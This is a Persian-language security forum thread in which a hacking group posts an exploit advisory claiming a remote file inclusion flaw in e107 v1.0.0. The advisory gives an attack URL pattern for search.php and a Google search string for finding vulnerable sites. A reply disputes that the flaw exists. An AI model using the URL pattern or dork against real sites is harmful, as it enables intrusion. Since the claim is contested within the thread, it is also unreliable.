IT Security Team  
بازگشت   IT Security Team > مقالات ، ابزارها و فیلم های آسیب پذیریهای Applicatin > Exploit ها و بررسی آسیب پذیریها



ثبت نام سريع
مشخصات شما هنوز در سايت ثبت نشده است . براي ثبت نام سريع از قسمت پايين اقدام كنيد .

نام کاربری: رمز عبور: تکرار رمز عبور: آدرس ایمیل: تکرار آدرس ایمیل:
 
تصویر تائید کننده
لطفا شش حرف یا عددی که در تصویر تائیدکننده مشاهده می کنید را وارد کنید.

  موافقم با قوانین انجمن  

پاسخ
 
LinkBack ابزارهای موضوع نحوه نمایش
قدیمی 01-09-2012, 09:45 AM   #1
عضو جديد
 
irist آواتار ها
 
تاریخ عضویت: Sep 2009
نوشته ها: 7
Thanks: 0
Thanked 5 Times in 3 Posts
Yahoo1 E107 V.1.0.0 Remote File Include Vulnerabilities

کد PHP:
############################################################################################################################################
***nbsp;                                                                                                                                         #
***nbsp;                          ISlamic Republic Of IRan Security Team                                                                         #
***nbsp;                                                                                                                                         #
***nbsp;                               http://irist.ir/forum/                                                                                    #
***nbsp;                                                                                                                                         #
############################################################################################################################################
***nbsp;                                                                                                                                         #
***nbsp;E107 V.1.0.0 Remote File Include Vulnerabilities                                                                                         #
***nbsp;                                                                                                                                         #
***nbsp;Download......: http://e107.org/edownload.php                                                                                            #
***nbsp;                                                                                                                                         #
***nbsp;Exploit.......: http://www.site.com/***91;path***93;/search.php?plug_require=***91;RFI***93;                                                                 #
***nbsp;                                                                                                                                         #
***nbsp;Google Search.: "Powered by e107"                                                                                                        #
***nbsp;                                                                                                                                         #
############################################################################################################################################
***nbsp;                                                                                                                                         #
***nbsp;Bug Found.....: IrIsT.Ir                                                                                                                 #
***nbsp;                                                                                                                                         #
***nbsp;discovery.....: Am!r (IrIsT™)                                                                                                            #
***nbsp;                                                                                                                                         #
***nbsp;contact.......: Amir***91;at***93;IrIsT.ir                                                                                                         #
***nbsp;                                                                                                                                         #
***nbsp;SP TNX........: The-0utl4w & A.u.r.A & B3HZ4D & m3hdi & joker_s & R3ZA BLACK HAT & kalkal-hacking & Nex^d3v!l & SeCuRiTy                 #
***nbsp;                                                                                                                                         #
***nbsp;  IrIsT.Ir & Aria-security.Com & H4ckcity.org & Iranhack.Org &  Zarbat.org  &  kalkalhacking.ooq.ir & All Iranian Team                   #
***nbsp;                                                                                                                                         #
###########################################################################################################################################***nbsp;
__________________
بهترین سایت آموزشی در زمینه های هک و نفوذ گری, لینوکس, ویندوز, شبکه و سرور و امنیت و ...

کاری از گروه IrIsT

Islamic Republic Of Iran Security Team

Www.IrIsT.Ir

تالار گفتمان

Www.IrIsT.Ir/forum

در صورت تمایل به همکاری با گروه IrIsT لطفا با ایمیل زیر تماس بگیرید:

[فقط اعضای سایت قادر به دیدن لینکها میباشند ]

موفق باشید.
irist آنلاین نیست.   پاسخ با نقل قول
The Following 2 Users Say Thank You to irist For This Useful Post:
joker_s (02-17-2012), zarbat (02-11-2012)
قدیمی 01-29-2012, 09:53 PM   #2
عضو جديد
 
singleye آواتار ها
 
تاریخ عضویت: Jan 2012
نوشته ها: 8
Thanks: 0
Thanked 2 Times in 2 Posts
پیش فرض

دوست عزیز چیزی که شما گذاشتین برای نسخه انگلیس زبان
دوم اینکه این اصلا آسیب پذیری نیست چو تابع search_info در بالای آن به صورت متغیر برابر آرایه قرار گرفته و متغیر که نام بردین به عنواو آرگامن تابع وجود داره و پایین فقط برای شرط استفاده شده است
قرار نیست هر متغییری که داخل require_once قرار گرفت آسیب پذیر باشد
هرکی که سیبیل داشت بابام که نیست
موفق باشی
singleye آنلاین نیست.   پاسخ با نقل قول
The Following User Says Thank You to singleye For This Useful Post:
zarbat (02-11-2012)
قدیمی 02-09-2012, 07:58 PM   #3
عضو جديد
 
irist آواتار ها
 
تاریخ عضویت: Sep 2009
نوشته ها: 7
Thanks: 0
Thanked 5 Times in 3 Posts
پیش فرض

با سلام.
دوست عزیز با تشکر از شما.
باید بگم که قبل از ثبت هر باگی,اول اون تست می شه.هم روی لوکال و هم توی ریموت.بعد ثبت می شه.
سایتی هم که باگ رو ثبت میکنه,اول خودش تست می زنه روی پورتال.بعد ثبت می شه.
موفق باشید
__________________
بهترین سایت آموزشی در زمینه های هک و نفوذ گری, لینوکس, ویندوز, شبکه و سرور و امنیت و ...

کاری از گروه IrIsT

Islamic Republic Of Iran Security Team

Www.IrIsT.Ir

تالار گفتمان

Www.IrIsT.Ir/forum

در صورت تمایل به همکاری با گروه IrIsT لطفا با ایمیل زیر تماس بگیرید:

[فقط اعضای سایت قادر به دیدن لینکها میباشند ]

موفق باشید.
irist آنلاین نیست.   پاسخ با نقل قول
The Following 2 Users Say Thank You to irist For This Useful Post:
joker_s (02-17-2012), zarbat (02-11-2012)
پاسخ

ابزارهای موضوع
نحوه نمایش

مجوز های ارسال و ویرایش
شما نمیتوانید موضوع جدیدی ارسال کنید
شما امکان ارسال پاسخ را ندارید
شما نمیتوانید فایل پیوست در پست خود ضمیمه کنید
شما نمیتوانید پست های خود را ویرایش کنید

BB code هست فعال
شکلک ها فعال است
کد [IMG] فعال است
کد HTML غیر فعال است
Trackbacks are فعال
Pingbacks are فعال
Refbacks are فعال



اکنون ساعت 06:06 AM برپایه ساعت جهانی (GMT - گرینویچ) +4.5 می باشد.


Powered by vBulletin
Copyright ©2000 - 2012, Jelsoft Enterprises Ltd

كليه حقوق اين وب سايت براي ITSecTeam محفوظ ميباشد


Content Relevant URLs by vBSEO ©2011, Crawlability, Inc.